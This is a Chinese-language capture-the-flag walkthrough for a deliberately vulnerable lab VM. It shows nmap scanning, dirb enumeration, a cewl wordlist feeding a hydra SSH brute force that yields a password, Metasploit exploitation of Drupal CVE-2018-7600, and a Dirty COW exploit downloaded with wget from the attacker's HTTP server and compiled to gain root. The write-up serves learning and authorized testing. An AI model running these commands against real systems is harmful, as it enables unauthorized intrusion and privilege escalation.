本文仅用于技术讨论与学习，利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。

只供对已授权的目标使用测试，对未授权目标的测试作者不承担责任，均由使用本人自行承担。

第一步信息收集

在虚拟机中确认攻击的ip地址，nmap获取目标ip 地址

使用命令：nmap -sP 192.168.222.0/24
解释:(ip地址是你自己的物理机ip第三个小数点后面改0/24）

得到ip后开始探索ip地址开放端口和一些服务。继续用nmap全端口扫描：
使用命令：nmap -sS -sV -T5 -A -p- 192.168.222.137

F12 查看这是一个静态页面，没发现什么有用的信息所以换1898端口：

可以分别进入两个页面：

发现两个文件:

使用命令：dirb http://192.168.222.137:1898 -o out

找到一个robots.txt的文件，后台打开看看：

在CHANGELOG.txt文件中发现了网站的基本信息。

使用命令：cewl http://192.168.222.137:1898/?q=node/1 -w mmbx.txt
hydra -l tiago -P mmbx.txt 192.168.222.137 ssh

先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索 cewl学习，然后九头蛇暴力破解得到用户密码：

用户: tiago
密码: Virgulino

重要的来了！！！！使用用户名tiago进行ssh登陆连接，成功连接，但是不能用sudo su进 行提权！！

第二部shell提权

现在利用收集到的信息进行提权 刚刚在文件收集到这个网站是2016年的Durpal7

这边我们查询到Drupal漏洞CVE-2018-7600，我们尝试使用MSF进行渗透试试。

先输入指令：msfconsole

再search CVE-2018-7600
然后再use这个指令

rhosts设置靶机IP
rport设置靶机端口
run开跑

命令：searchsploit dirty查找脏牛提权shell，利用40847.cpp

思路是继续开启本地pthon服务，然后把40847.cp发送到靶机上
命令：python -m http.server 8879 开启服务
网站登录端口（这里注意，ip地址是你kali的IP地址）

命令：wget http://192.168.222.128 :8879/40847.cpp

将40847.cp上传到靶机上

命令：g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
        1. -Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
        2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
        3. -O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
        4. -std=c++11就是用按C++2011标准来编译的
        5. -pthread 在Linux中要用到多线程时，需要链接pthread库
        6. -o dcow gcc生成的目标文件,名字为dcow

执行gcc编译可执行文件，可直接提权。

打开文件成功看到靶机root的密码

直接登录root

输入ls（列出目前工作目录所含之文件及子目录）

发现flag最后查看文件即可。